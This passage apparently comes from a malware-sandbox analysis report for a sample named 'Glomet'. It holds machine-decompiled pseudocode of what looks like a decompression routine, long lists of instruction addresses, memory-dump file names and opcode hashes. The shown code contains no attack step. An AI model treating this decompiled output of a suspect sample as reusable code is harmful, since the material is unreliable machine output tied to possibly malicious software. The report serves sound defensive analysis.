                                                                                                                                                                              													__edx =  *(__ebp - 8);
                                                                                                                                                                              													__ebx = __ebx - __eax;
                                                                                                                                                                              													__edx =  *(__ebp - 8) + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                                                                                                              													__ecx = __eax;
                                                                                                                                                                              													__eax = __esi[1];
                                                                                                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              													__ecx = __esi[2];
                                                                                                                                                                              													__eax = __eax >> 5;
                                                                                                                                                                              													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                                                                                                              													__eax = __eax & 0x0000001f;
                                                                                                                                                                              													__eax = __edi + __eax + 0x102;
                                                                                                                                                                              													__edi = __edx + __ecx;
                                                                                                                                                                              													__eflags = __edx + __ecx - __eax;
                                                                                                                                                                              													if(__edx + __ecx > __eax) {
                                                                                                                                                                              														goto L9;
                                                                                                                                                                              													}
                                                                                                                                                                              													L86:
                                                                                                                                                                              													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                                                                                                              													if( *(__ebp - 0x14) != 0x10) {
                                                                                                                                                                              														L89:
                                                                                                                                                                              														__edi = 0;
                                                                                                                                                                              														__eflags = 0;
                                                                                                                                                                              														L90:
                                                                                                                                                                              														__eax = __esi + 0xc + __ecx * 4;
                                                                                                                                                                              														do {
                                                                                                                                                                              															L91:
                                                                                                                                                                              															 *__eax = __edi;
                                                                                                                                                                              															__ecx = __ecx + 1;
                                                                                                                                                                              															__eax = __eax + 4;
                                                                                                                                                                              															__edx = __edx - 1;
                                                                                                                                                                              															__eflags = __edx;
                                                                                                                                                                              														} while (__edx != 0);
                                                                                                                                                                              														__esi[2] = __ecx;
                                                                                                                                                                              														continue;
                                                                                                                                                                              													}
                                                                                                                                                                              													L87:
                                                                                                                                                                              													__eflags = __ecx - 1;
                                                                                                                                                                              													if(__ecx < 1) {
                                                                                                                                                                              														goto L9;
                                                                                                                                                                              													}
                                                                                                                                                                              													L88:
                                                                                                                                                                              													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                                                                                                              													goto L90;
                                                                                                                                                                              												}
                                                                                                                                                                              												L78:
                                                                                                                                                                              												__ecx = __edx;
                                                                                                                                                                              												__ebx = __ebx - __edx;
                                                                                                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                                                                                                              												__ecx = __esi[2];
                                                                                                                                                                              												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                                                                                                              												__esi[2] = __esi[2] + 1;
                                                                                                                                                                              											}
                                                                                                                                                                              											L94:
                                                                                                                                                                              											__eax = __esi[1];
                                                                                                                                                                              											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                                                                                                              											__edi = __eax;
                                                                                                                                                                              											__eax = __eax >> 5;
                                                                                                                                                                              											__edi = __edi & 0x0000001f;
                                                                                                                                                                              											__ecx = 0x101;
                                                                                                                                                                              											__eax = __eax & 0x0000001f;
                                                                                                                                                                              											__edi = __edi + 0x101;
                                                                                                                                                                              											__eax = __eax + 1;
                                                                                                                                                                              											__edx = __ebp - 0xc;
                                                                                                                                                                              											 *(__ebp - 0x14) = __eax;
                                                                                                                                                                              											 &(__esi[0x148]) = __ebp - 4;
                                                                                                                                                                              											 *(__ebp - 4) = 9;
                                                                                                                                                                              											__ebp - 0x18 =  &(__esi[3]);
                                                                                                                                                                              											 *(__ebp - 0x10) = 6;
                                                                                                                                                                              											__eax = E0040727F( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                                                              											__eflags =  *(__ebp - 4);
                                                                                                                                                                              											if( *(__ebp - 4) == 0) {
                                                                                                                                                                              												__eax = __eax | 0xffffffff;
                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                              											}
                                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                                              												goto L9;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												L97:
                                                                                                                                                                              												__ebp - 0xc =  &(__esi[0x148]);
                                                                                                                                                                              												__ebp - 0x10 = __ebp - 0x1c;
                                                                                                                                                                              												__eax = __esi + 0xc + __edi * 4;
                                                                                                                                                                              												__eax = E0040727F(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                              												if(__eax != 0) {
                                                                                                                                                                              													goto L9;
                                                                                                                                                                              												}
                                                                                                                                                                              												L98:
                                                                                                                                                                              												__eax =  *(__ebp - 0x10);
                                                                                                                                                                              												__eflags =  *(__ebp - 0x10);
                                                                                                                                                                              												if( *(__ebp - 0x10) != 0) {
                                                                                                                                                                              													L100:
                                                                                                                                                                              													__cl =  *(__ebp - 4);
                                                                                                                                                                              													 *__esi =  *__esi & 0x00000000;
                                                                                                                                                                              													__eflags =  *__esi;
                                                                                                                                                                              													__esi[4] = __al;
                                                                                                                                                                              													__eax =  *(__ebp - 0x18);
                                                                                                                                                                              													__esi[5] =  *(__ebp - 0x18);
                                                                                                                                                                              													__eax =  *(__ebp - 0x1c);
                                                                                                                                                                              													__esi[4] = __cl;
                                                                                                                                                                              													__esi[6] =  *(__ebp - 0x1c);
                                                                                                                                                                              													goto L101;
                                                                                                                                                                              												}
                                                                                                                                                                              												L99:
                                                                                                                                                                              												__eflags = __edi - 0x101;
                                                                                                                                                                              												if(__edi > 0x101) {
                                                                                                                                                                              													goto L9;
                                                                                                                                                                              												}
                                                                                                                                                                              												goto L100;
                                                                                                                                                                              											}
                                                                                                                                                                              										case 0xe:
                                                                                                                                                                              											goto L9;
                                                                                                                                                                              										case 0xf:
                                                                                                                                                                              											L175:
                                                                                                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                                                                                                              											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                                                                                                              											__eax = E00407217( *((intOrPtr*)(__ebp + 8)));
                                                                                                                                                                              											__ecx = __esi[0x26ea];
                                                                                                                                                                              											__edx = __esi[0x26e9];
                                                                                                                                                                              											__eflags = __ecx - __edx;
                                                                                                                                                                              											 *(__ebp - 0x30) = __ecx;
                                                                                                                                                                              											if(__ecx >= __edx) {
                                                                                                                                                                              												__eax = __esi[0x26e8];
                                                                                                                                                                              												__eax = __esi[0x26e8] - __ecx;
                                                                                                                                                                              												__eflags = __eax;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												__edx = __edx - __ecx;
                                                                                                                                                                              												__eax = __edx - __ecx - 1;
                                                                                                                                                                              											}
                                                                                                                                                                              											__eflags = __ecx - __edx;
                                                                                                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                              											if(__ecx != __edx) {
                                                                                                                                                                              												L183:
                                                                                                                                                                              												__edi = 0;
                                                                                                                                                                              												goto L10;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												L179:
                                                                                                                                                                              												__eax = __esi[0x145];
                                                                                                                                                                              												__eflags = __eax - 8;
                                                                                                                                                                              												 *__esi = __eax;
                                                                                                                                                                              												if(__eax != 8) {
                                                                                                                                                                              													L184:
                                                                                                                                                                              													0 = 1;
                                                                                                                                                                              													goto L10;
                                                                                                                                                                              												}
                                                                                                                                                                              												goto L180;
                                                                                                                                                                              											}
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								L181:
                                                                                                                                                                              								goto L9;
                                                                                                                                                                              							}
                                                                                                                                                                              							L70:
                                                                                                                                                                              							if( *__edi == __eax) {
                                                                                                                                                                              								goto L72;
                                                                                                                                                                              							}
                                                                                                                                                                              							L71:
                                                                                                                                                                              							__esi[2] = __esi[2] & __eax;
                                                                                                                                                                              							 *__esi = 0xd;
                                                                                                                                                                              							goto L93;
                                                                                                                                                                              						}
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				L182:
                                                                                                                                                                              				_t443 = 0;
                                                                                                                                                                              				_t446[0x147] =  *(_t448 - 0x40);
                                                                                                                                                                              				_t446[0x146] = _t425;
                                                                                                                                                                              				( *(_t448 + 8))[1] = 0;
                                                                                                                                                                              				goto L11;
                                                                                                                                                                              			}









                                                                                                                                                                              0x00406e1e
                                                                                                                                                                              0x00406e21
                                                                                                                                                                              0x00406e25
                                                                                                                                                                              0x00406e28
                                                                                                                                                                              0x00406e2a
                                                                                                                                                                              0x00406e2d
                                                                                                                                                                              0x00406e2f
                                                                                                                                                                              0x00406e43
                                                                                                                                                                              0x00406e43
                                                                                                                                                                              0x00406e46
                                                                                                                                                                              0x00406e60
                                                                                                                                                                              0x00406e60
                                                                                                                                                                              0x00406e63
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e69
                                                                                                                                                                              0x00406e69
                                                                                                                                                                              0x00406e6c
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e72
                                                                                                                                                                              0x00406e72
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e72
                                                                                                                                                                              0x00406e48
                                                                                                                                                                              0x00406e4b
                                                                                                                                                                              0x00406e52
                                                                                                                                                                              0x00406e55
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e55
                                                                                                                                                                              0x00406e31
                                                                                                                                                                              0x00406e35
                                                                                                                                                                              0x00406e38
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e7d
                                                                                                                                                                              0x00406e7d
                                                                                                                                                                              0x00406ea2
                                                                                                                                                                              0x00406ea2
                                                                                                                                                                              0x00406ea2
                                                                                                                                                                              0x00406ea4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e82
                                                                                                                                                                              0x00406e82
                                                                                                                                                                              0x00406e86
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406e8c
                                                                                                                                                                              0x00406e8c
                                                                                                                                                                              0x00406e8f
                                                                                                                                                                              0x00406e92
                                                                                                                                                                              0x00406e95
                                                                                                                                                                              0x00406e97
                                                                                                                                                                              0x00406e99
                                                                                                                                                                              0x00406e9c
                                                                                                                                                                              0x00406e9f
                                                                                                                                                                              0x00406e9f
                                                                                                                                                                              0x00406e9f
                                                                                                                                                                              0x00406ea6
                                                                                                                                                                              0x00406eae
                                                                                                                                                                              0x00406eb1
                                                                                                                                                                              0x00406eb4
                                                                                                                                                                              0x00406eb6
                                                                                                                                                                              0x00406eb9
                                                                                                                                                                              0x00406eb9
                                                                                                                                                                              0x00406ebb
                                                                                                                                                                              0x00406ebf
                                                                                                                                                                              0x00406ec2
                                                                                                                                                                              0x00406ec5
                                                                                                                                                                              0x00406ec8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406ece
                                                                                                                                                                              0x00406ece
                                                                                                                                                                              0x00406ef3
                                                                                                                                                                              0x00406ef3
                                                                                                                                                                              0x00406ef3
                                                                                                                                                                              0x00406ef5
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406ed3
                                                                                                                                                                              0x00406ed3
                                                                                                                                                                              0x00406ed7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406edd
                                                                                                                                                                              0x00406edd
                                                                                                                                                                              0x00406ee0
                                                                                                                                                                              0x00406ee3
                                                                                                                                                                              0x00406ee6
                                                                                                                                                                              0x00406ee8
                                                                                                                                                                              0x00406eea
                                                                                                                                                                              0x00406eed
                                                                                                                                                                              0x00406ef0
                                                                                                                                                                              0x00406ef0
                                                                                                                                                                              0x00406ef0
                                                                                                                                                                              0x00406ef7
                                                                                                                                                                              0x00406ef7
                                                                                                                                                                              0x00406eff
                                                                                                                                                                              0x00406f02
                                                                                                                                                                              0x00406f05
                                                                                                                                                                              0x00406f08
                                                                                                                                                                              0x00406f0c
                                                                                                                                                                              0x00406f0f
                                                                                                                                                                              0x00406f11
                                                                                                                                                                              0x00406f14
                                                                                                                                                                              0x00406f17
                                                                                                                                                                              0x00406f31
                                                                                                                                                                              0x00406f31
                                                                                                                                                                              0x00406f34
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406f3a
                                                                                                                                                                              0x00406f3a
                                                                                                                                                                              0x00406f3d
                                                                                                                                                                              0x00406f44
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406f44
                                                                                                                                                                              0x00406f19
                                                                                                                                                                              0x00406f1c
                                                                                                                                                                              0x00406f23
                                                                                                                                                                              0x00406f26
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406f4c
                                                                                                                                                                              0x00406f4c
                                                                                                                                                                              0x00406f71
                                                                                                                                                                              0x00406f71
                                                                                                                                                                              0x00406f71
                                                                                                                                                                              0x00406f73
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406f51
                                                                                                                                                                              0x00406f51
                                                                                                                                                                              0x00406f55
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406f5b
                                                                                                                                                                              0x00406f5b
                                                                                                                                                                              0x00406f5e
                                                                                                                                                                              0x00406f61
                                                                                                                                                                              0x00406f64
                                                                                                                                                                              0x00406f66
                                                                                                                                                                              0x00406f68
                                                                                                                                                                              0x00406f6b
                                                                                                                                                                              0x00406f6e
                                                                                                                                                                              0x00406f6e
                                                                                                                                                                              0x00406f6e
                                                                                                                                                                              0x00406f75
                                                                                                                                                                              0x00406f7d
                                                                                                                                                                              0x004070cb
                                                                                                                                                                              0x004070c4
                                                                                                                                                                              0x004070c4
                                                                                                                                                                              0x004070c6
                                                                                                                                                                              0x004070c6
                                                                                                                                                                              0x004070cd
                                                                                                                                                                              0x004070cf
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407147
                                                                                                                                                                              0x00407147
                                                                                                                                                                              0x0040714a
                                                                                                                                                                              0x0040714c
                                                                                                                                                                              0x0040714f
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00407152
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406800
                                                                                                                                                                              0x004067e4
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004067ea
                                                                                                                                                                              0x004067ed
                                                                                                                                                                              0x004067f7
                                                                                                                                                                              0x004067fa
                                                                                                                                                                              0x004067fd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004067fd
                                                                                                                                                                              0x004067e4
                                                                                                                                                                              0x00406808
                                                                                                                                                                              0x0040680b
                                                                                                                                                                              0x0040680f
                                                                                                                                                                              0x00406819
                                                                                                                                                                              0x00406823
                                                                                                                                                                              0x00406826
                                                                                                                                                                              0x0040682c
                                                                                                                                                                              0x00406960
                                                                                                                                                                              0x00406962
                                                                                                                                                                              0x00406968
                                                                                                                                                                              0x0040696b
                                                                                                                                                                              0x0040696e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040696e
                                                                                                                                                                              0x00406832
                                                                                                                                                                              0x00406832
                                                                                                                                                                              0x00406833
                                                                                                                                                                              0x0040688b
                                                                                                                                                                              0x0040688b
                                                                                                                                                                              0x00406892
                                                                                                                                                                              0x00406938
                                                                                                                                                                              0x00406938
                                                                                                                                                                              0x0040693d
                                                                                                                                                                              0x00406940
                                                                                                                                                                              0x00406945
                                                                                                                                                                              0x00406948
                                                                                                                                                                              0x0040694d
                                                                                                                                                                              0x00406950
                                                                                                                                                                              0x00406955
                                                                                                                                                                              0x00406958
                                                                                                                                                                              0x00406958
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x00406898
                                                                                                                                                                              0x0040689c
                                                                                                                                                                              0x0040689c
                                                                                                                                                                              0x004068be
                                                                                                                                                                              0x004068c1
                                                                                                                                                                              0x004068c3
                                                                                                                                                                              0x004068c6
                                                                                                                                                                              0x004068cb
                                                                                                                                                                              0x004068a1
                                                                                                                                                                              0x004068a1
                                                                                                                                                                              0x004068a6
                                                                                                                                                                              0x004068a8
                                                                                                                                                                              0x004068aa
                                                                                                                                                                              0x004068af
                                                                                                                                                                              0x004068b5
                                                                                                                                                                              0x004068ba
                                                                                                                                                                              0x004068bc
                                                                                                                                                                              0x004068bc
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068b1
                                                                                                                                                                              0x004068af
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004068cd
                                                                                                                                                                              0x004068fa
                                                                                                                                                                              0x004068ff
                                                                                                                                                                              0x00406901
                                                                                                                                                                              0x00406902
                                                                                                                                                                              0x00406904
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x00406905
                                                                                                                                                                              0x0040692d
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406932
                                                                                                                                                                              0x004068cb
                                                                                                                                                                              0x00406892
                                                                                                                                                                              0x00406835
                                                                                                                                                                              0x00406835
                                                                                                                                                                              0x00406836
                                                                                                                                                                              0x00406880
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406880
                                                                                                                                                                              0x00406838
                                                                                                                                                                              0x00406839
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406995
                                                                                                                                                                              0x00406998
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406975
                                                                                                                                                                              0x00406975
                                                                                                                                                                              0x00406979
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040697f
                                                                                                                                                                              0x0040697f
                                                                                                                                                                              0x00406982
                                                                                                                                                                              0x00406985
                                                                                                                                                                              0x0040698a
                                                                                                                                                                              0x0040698c
                                                                                                                                                                              0x0040698f
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x00406992
                                                                                                                                                                              0x0040699a
                                                                                                                                                                              0x0040699a
                                                                                                                                                                              0x0040699d
                                                                                                                                                                              0x0040699f
                                                                                                                                                                              0x004069a4
                                                                                                                                                                              0x004069a7
                                                                                                                                                                              0x004069a9
                                                                                                                                                                              0x004069ac
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406c68
                                                                                                                                                                              0x00406c6b
                                                                                                                                                                              0x00406c6e
                                                                                                                                                                              0x00406c70
                                                                                                                                                                              0x00406c72
                                                                                                                                                                              0x00406c75
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c78
                                                                                                                                                                              0x00406c82
                                                                                                                                                                              0x00406c82
                                                                                                                                                                              0x00406c84
                                                                                                                                                                              0x00406c86
                                                                                                                                                                              0x00406c91
                                                                                                                                                                              0x00406c94
                                                                                                                                                                              0x00406c97
                                                                                                                                                                              0x00406c99
                                                                                                                                                                              0x00406c9b
                                                                                                                                                                              0x00406c9d
                                                                                                                                                                              0x00406ca0
                                                                                                                                                                              0x00406ca3
                                                                                                                                                                              0x00406ca8
                                                                                                                                                                              0x00406cab
                                                                                                                                                                              0x00406cae
                                                                                                                                                                              0x00406cb1
                                                                                                                                                                              0x00406cb8
                                                                                                                                                                              0x00406cbb
                                                                                                                                                                              0x00406cbd
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cc3
                                                                                                                                                                              0x00406cc3
                                                                                                                                                                              0x00406cc7
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cd8
                                                                                                                                                                              0x00406cda
                                                                                                                                                                              0x00406cda
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406cde
                                                                                                                                                                              0x00406ce0
                                                                                                                                                                              0x00406ce1
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce4
                                                                                                                                                                              0x00406ce7
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406ce7
                                                                                                                                                                              0x00406cc9
                                                                                                                                                                              0x00406cc9
                                                                                                                                                                              0x00406ccc
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406cd2
                                                                                                                                                                              0x00406c28
                                                                                                                                                                              0x00406c28
                                                                                                                                                                              0x00406c2a
                                                                                                                                                                              0x00406c2c
                                                                                                                                                                              0x00406c2f
                                                                                                                                                                              0x00406c32
                                                                                                                                                                              0x00406c36
                                                                                                                                                                              0x00406c36
                                                                                                                                                                              0x00406d0a
                                                                                                                                                                              0x00406d0a
                                                                                                                                                                              0x00406d0d
                                                                                                                                                                              0x00406d14
                                                                                                                                                                              0x00406d18
                                                                                                                                                                              0x00406d1a
                                                                                                                                                                              0x00406d1d
                                                                                                                                                                              0x00406d20
                                                                                                                                                                              0x00406d25
                                                                                                                                                                              0x00406d28
                                                                                                                                                                              0x00406d2a
                                                                                                                                                                              0x00406d2b
                                                                                                                                                                              0x00406d2e
                                                                                                                                                                              0x00406d39
                                                                                                                                                                              0x00406d3c
                                                                                                                                                                              0x00406d53
                                                                                                                                                                              0x00406d58
                                                                                                                                                                              0x00406d5f
                                                                                                                                                                              0x00406d64
                                                                                                                                                                              0x00406d68
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6a
                                                                                                                                                                              0x00406d6d
                                                                                                                                                                              0x00406d6f
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406d75
                                                                                                                                                                              0x00406d75
                                                                                                                                                                              0x00406d79
                                                                                                                                                                              0x00406d84
                                                                                                                                                                              0x00406d97
                                                                                                                                                                              0x00406d9c
                                                                                                                                                                              0x00406da1
                                                                                                                                                                              0x00406da3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406da9
                                                                                                                                                                              0x00406da9
                                                                                                                                                                              0x00406dac
                                                                                                                                                                              0x00406dae
                                                                                                                                                                              0x00406dbc
                                                                                                                                                                              0x00406dbc
                                                                                                                                                                              0x00406dbf
                                                                                                                                                                              0x00406dbf
                                                                                                                                                                              0x00406dc2
                                                                                                                                                                              0x00406dc5
                                                                                                                                                                              0x00406dc8
                                                                                                                                                                              0x00406dcb
                                                                                                                                                                              0x00406dce
                                                                                                                                                                              0x00406dd1
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406dd1
                                                                                                                                                                              0x00406db0
                                                                                                                                                                              0x00406db0
                                                                                                                                                                              0x00406db6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00406db6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407155
                                                                                                                                                                              0x00407155
                                                                                                                                                                              0x0040715b
                                                                                                                                                                              0x00407161
                                                                                                                                                                              0x00407166
                                                                                                                                                                              0x0040716c
                                                                                                                                                                              0x00407172
                                                                                                                                                                              0x00407174
                                                                                                                                                                              0x00407177
                                                                                                                                                                              0x00407180
                                                                                                                                                                              0x00407186
                                                                                                                                                                              0x00407186
                                                                                                                                                                              0x00407179
                                                                                                                                                                              0x0040717b
                                                                                                                                                                              0x0040717d
                                                                                                                                                                              0x0040717d
                                                                                                                                                                              0x00407188
                                                                                                                                                                              0x0040718a
                                                                                                                                                                              0x0040718d
                                                                                                                                                                              0x004071c8
                                                                                                                                                                              0x004071c8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040718f

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                                              • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                                                                                                                                              • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                                                                                                                                              • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040727F(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                              				unsigned int _v12;
                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                              				intOrPtr* _v32;
                                                                                                                                                                              				signed int* _v36;
                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                              				void _v116;
                                                                                                                                                                              				signed int _v176;
                                                                                                                                                                              				signed int _v180;
                                                                                                                                                                              				signed int _v240;
                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                              				signed int _t168;
                                                                                                                                                                              				intOrPtr _t175;
                                                                                                                                                                              				signed int _t181;
                                                                                                                                                                              				void* _t182;
                                                                                                                                                                              				intOrPtr _t183;
                                                                                                                                                                              				signed int* _t184;
                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                              				signed int _t187;
                                                                                                                                                                              				signed int* _t189;
                                                                                                                                                                              				signed int _t190;
                                                                                                                                                                              				intOrPtr* _t191;
                                                                                                                                                                              				intOrPtr _t192;
                                                                                                                                                                              				signed int _t193;
                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                              				signed int _t205;
                                                                                                                                                                              				void* _t207;
                                                                                                                                                                              				short _t208;
                                                                                                                                                                              				signed char _t222;
                                                                                                                                                                              				signed int _t224;
                                                                                                                                                                              				signed int _t225;
                                                                                                                                                                              				signed int* _t232;
                                                                                                                                                                              				signed int _t233;
                                                                                                                                                                              				signed int _t234;
                                                                                                                                                                              				void* _t235;
                                                                                                                                                                              				signed int _t236;
                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                              				signed int _t246;
                                                                                                                                                                              				signed int _t251;
                                                                                                                                                                              				signed int _t254;
                                                                                                                                                                              				signed int _t256;
                                                                                                                                                                              				signed int _t259;
                                                                                                                                                                              				signed int _t262;
                                                                                                                                                                              				void* _t263;
                                                                                                                                                                              				void* _t264;
                                                                                                                                                                              				signed int _t267;
                                                                                                                                                                              				intOrPtr _t269;
                                                                                                                                                                              				intOrPtr _t271;
                                                                                                                                                                              				signed int _t274;
                                                                                                                                                                              				intOrPtr* _t275;
                                                                                                                                                                              				unsigned int _t276;
                                                                                                                                                                              				void* _t277;
                                                                                                                                                                              				signed int _t278;
                                                                                                                                                                              				intOrPtr* _t279;
                                                                                                                                                                              				signed int _t281;
                                                                                                                                                                              				intOrPtr _t282;
                                                                                                                                                                              				intOrPtr _t283;
                                                                                                                                                                              				signed int* _t284;
                                                                                                                                                                              				signed int _t286;
                                                                                                                                                                              				signed int _t287;
                                                                                                                                                                              				signed int _t288;
                                                                                                                                                                              				signed int _t296;
                                                                                                                                                                              				signed int* _t297;
                                                                                                                                                                              				intOrPtr _t298;
